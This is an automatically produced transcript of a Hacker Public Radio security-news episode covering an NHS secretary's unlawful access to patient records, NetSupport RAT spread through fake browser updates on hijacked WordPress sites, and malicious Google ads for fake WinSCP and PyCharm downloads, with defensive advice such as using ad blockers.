hpr-knowledge-base/hpr_transcripts/hpr3997.txt

Episode: 3997
Title: HPR3997: The Oh No! News.
Source: https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr3997/hpr3997.mp3
Transcribed: 2025-10-25 18:26:14

---

This is Hacker Public Radio Episode 3997 for Tuesday, the 28th of November 2023.
Today's show is entitled The Oh No News.
It is part of the series' privacy and security.
It is hosted by some guy on the internet, and is about 15 minutes long.
It carries a clean flag.
The summary is, Scotty talks about malware-distributed via Google's dynamic ads and more.
Hello and welcome to another episode of Hacker Public Radio.
I'm your host, some guy on the internet.
First of all, I'd like to apologize for the background noise.
I have the washer and dryer going, and if you can hear it in the background, it sounds
like a zipper rattling around in the dryer.
Unfortunately, at this time, there's nothing I can do about it.
With that said, let's get on with the show.
Threat analysis, your attack surface.
Now for the first bit of news, we're going to head on over to the UK, where we're going
to be talking about a former NHS Secretary that was found guilty of accessing patient records.
Illegally.
That's right.
And this person was found guilty and fined for accessing over 150 people's medical records
illegally.
Their name is Loretta Al-Burgetti, and they're from a town somewhere in the UK I suppose
call Reditch.
I feel like I have to definitely invoke my American accent with the humble vibes of
the internet when I say that word.
Reditch.
Now this individual worked as the medical secretary within the orthomology department of
the Warchess Shire, acute hospitals, NHS Trust.
The incident apparently happened somewhere around June of 2019, and they don't really
say in the story how the patient who first noticed that something fishy was going on
like how they discovered my guess is there was a bit of social engineering maybe during
conversation with this secretary, this patient who was I guess in no way under the care
of Miss Al-Burgetti must have been involved in conversation and suddenly their medical records
may have came up in the conversation, right?
Like I said, the story does not tell us how the patient knew, but apparently the patient
grew concerned because obviously this person who has no business accessing the medical
records is now just simply revealing that they have access to this person's medical records,
but they have no responsibility of care.
And one of the bits of information I learned from a story, apparently this may be an actual
legal term or just common term in the UK, they refer to it as a business need.
So I'm assuming when dealing with legal cases and law, anything like that, in this story
they refer to her illegal access was without consent or having a business need.
So I thought that was interesting, I thought I'd share it, yet it may clear that the records
she was accessing were not a part of her department.
She's a part of a pathomology department, hopefully I'm saying that correctly.
Alright, she already had her court date on 15th of November 2023, where she pled guilty
to unlawfully obtaining personal data under Section 170 of the Data Protection Act of
2018.
And she was ordered to pay a total of a whopping 648 pounds.
So I know a few of you may be wondering why on earth is this story in here?
Simple, the same way you review logs on your systems because you're looking for a data
breach is the same way you can actually review information in the conversation to learn
whether or not somebody around you has information about you that they shouldn't have.
And I'm assuming that's how this person was found out.
They were revealing that they have information that well, they really have no quote, business
need, close quote, and they were found out.
So don't just review the logs on your system, review the logs of the conversations around
you.
That's right, look to the nearest individual that's next to you and ask them, let me see
your logs.
Oh, and by the way.
If you end up in HR because of that, you're on your own.
I will deny all knowledge of knowing you or having said this.
Now I've never been to the UK little on bridge, but I have included a open street maps link
so that way you can click on it and kind of see what the area looks like from the open
street max voxel map looks pretty nice looks like there's lots of rural area.
So the next time you decide to swing by riddich, make sure that you stop by and say hello
to someone that actually lives there in our next article.
Hitting on over to the hacker news looks like we're covering net support again, which
originated as a legitimate remote administration tool now as classified as a remote access
trojan.
So it's 100% malware.
I believe the intention was always to become malware, but in order to first get a group
of victims, it started off as a legitimate tool.
Well, apparently it's on the rise again.
A cybersecurity firm has reported that there have been new infections of this rat short
for remote access trojan and it's coming to us via wordpress good old wordpress filled
with malware.
Yeah, I'm pretty sure it probably starts out.
Some new wants to save a couple of dollars putting up their own website.
They heard about wordpress, probably even grabbed a few plugins that aren't supported
anymore, stacked it all together on the internet and just walked away from it.
When you do that, scriptkitties come along.
They basically hijacked your site and start using it for this kind of behavior.
So I'm not surprised.
The moment I saw wordpress in the story, I already knew what had happened and the story
doesn't specifically tell us everything that I just said where you know, scriptkitties
come along and hijacked a site due to a unmaintained wordpress plugin.
But it does tell you that basically once the attackers gain access to the wordpress site,
however they accomplish that, the attack then starts with some social engineering would
use a deceptive browser updates.
From there you get a JavaScript payload.
The JavaScript payload then leads to a PowerShell script.
The PowerShell script then reaches out grabs the rat.
Then it'll be can out to a C2 server, C2 command and control.
And now your PC is owned now looks like it's just windows PCs for now.
But if you are using Unix like systems, it didn't mean that you can just relax.
Just because the payload does not run on a Unix like system, doesn't mean the Unix
like system cannot be used to spread the infection to windows machines.
Thus making you a carrier of the payload.
So in summary, be careful of deceptive browser updates.
If you don't already have a pop up blocker or some DNS protection like pie hole, you
probably want to look into that.
It's just the safest way to view the internet right now.
I don't care what anyone says about pirating or whatever.
You need to protect yourself, figure out the rest later.
In our next article, beware malicious Google ads trick win SCP users into installing malware.
Now this story is related to our last story in the way that you should be using an ad
blogger because it is for your security on the internet.
People engineering isn't just when an individual texts you or engages in a phone call with
you in an attempt to gain access to whatever information you have.
It is also a for lack of a better term product provided by Google.
Alright, so in this story, attackers were believed to be using Google's dynamic ads, I believe
to call them our DSA's dynamic search ads.
This is a product by Google.
And I'm sure if you look deep enough into it, it's got something to do with AI, right?
You want to be the fastest one out there just providing ads quick and easy based off
or whatever's on the internet.
Attackers probably found a way to abuse this system using these dynamic search ads there
now using Google to advertise malware to Google's users.
If you're using Google Chrome, if you're using the Google web engine and you're doing
that without an ad blocker, ads that you're being served via Google may contain malware.
If they don't contain it, they'll lead you to where you're going to get the malware.
The story goes into more detail telling us about how these fake win SCP sites operate
and how some individuals good heavens were rick rolled on the internet.
That was just one of the examples of what happened, but truthfully, there are some malicious
payloads also being delivered. So if all that happens to you through one of these ads is that
you click on it and get rick rolled, count yourself lucky and go ahead and get yourself an ad blocker.
Or set a pie hole. Now the story also talks about or it links to a previous attack where the
attackers attempted to link unsuspecting users to a malicious copy of pie charm, which is a
Python development environment. I go ahead and pull that link, put it down in a show note so you
can have a look at it. But the reason I'm mentioning it is because it once again covers the exact
same thing. You need to be using an ad blocker. The people who were led to this malicious version
of pie charm that was infected with malware and attempted to be distributed to unsuspecting users
by the attackers. They were served these malicious ads. Now in these stories, they like to use all
of this language that I cut out when I'm giving the stories. Like for instance, they call it
malvertising. I'm never going to do that. Same thing like when you see fishing, we all understand
fishing, but they like to change it whenever it happens via other communication platforms.
So you'll see it called fishing with a V instead of normal fishing pH. I've also saw
smishing once before. Did you just get a little carried away? Some of that sensational journalism
going on out there. Same thing with the language used to cover attackers. I use a simple generic term
that everyone will understand attackers. I'm not calling them threat actors. I'm not calling them
cyber gangs or any of this nonsense. But you have back on track with the whole pie charm thing.
Basically, the users were served and ad via Google when they were looking to get pie charm.
The ad led them to a false location where they received a malicious version of pie charm.
And there you go. Now you got a developer running around with all sorts of malware loaded
up on their system. There's no telling how that's affecting their project. So just a ton of work
that needs to be done after that kind of thing gets found out. TLDR, get an ad blocker, or else you
go end up with malware, especially if you're using Google. Info sec, the language of security.
All right, we're going to go ahead and round things out with info sec and you the consumers
as well as those of you who count yourself as the defenders. Here's a nice little article.
I thought I'd include it because it does contain a lot of helpful information. But here for
the show, I go ahead and give you a little bit of a TLDR. If you're a company out there and you're
deploying a project, stop trying to be the fastest one to deliver whatever it is with the least
amount of people hired to do that job. Where your breakdown is going to happen is when you don't
have enough human beings monitoring for threats. I mean, how many times have we seen stories
where companies are trying to cut down the costs, but they do so in QA and other areas where they
desperately need human beings to actually review the product before it is released.
You know, if you had actual human beings there, you can catch a lot of this stuff,
but companies want to cut down on that cost. They do that through labor and they try to replace it
with AI and other other software measures to reduce costs. If you're going to adopt the mindset
of being the fastest one out the gate to deliver product, then you'll have to maintain that
way of thinking by hiring people to help you do that. That's the first thing that I'll say under
the TLDR flag there because the article is quite long and covers a number of wonderful points.
And the second thing, well, second and last, I'll leave the rest up to you if you'd want to read
through the article. Automation does not necessarily mean AI or what we're referring to as AI.
Because to be honest with you, AI just sounds like better database access, right? Or what some
would refer to as better database access. It depends on how you're using this technology.
But more to the point, you want automation so that yes, there is some hands off and more standardization
of the process, but you want human beings monitoring the process nonetheless. Just because it's
automated does not mean it cannot be attacked or flawed. Fresh eyes normally finds flaws,
but you only have fresh eyes if you have people. You know what I mean? Also, you know,
cough cough wouldn't hurt the open sourced cold so that we can have more eyes on a cough cough.
But that's all I got time for today. I'm going to go ahead and cut you guys loose get this episode
at the door because we're low on shows and I believe I've taken up enough of your time. You want
to hear more Oh no news. Stay tuned in Hacker Public Radio. We have tons of wonderful
shows by tons of wonderful hosts. I was about to say correspondents, but that sounds kind of wild.
Put my monocle on and grab my cup of tea. Yes, I'm a correspondent here on the HPR.
No, but seriously, I'll catch you guys in next episode. Oh no!
You have been listening to Hacker Public Radio.
At Hacker Public Radio does work. Today's show was contributed by a HPR listener like yourself.
If you ever thought of recording podcast, you click on our contribute link to find out how easy it
really is. Hosting for HPR has been kindly provided by an onsthost.com, the internet archive,
and our syncs.net. On the Sadois status, today's show is released under Creative Commons,
Attribution 4.0 International License.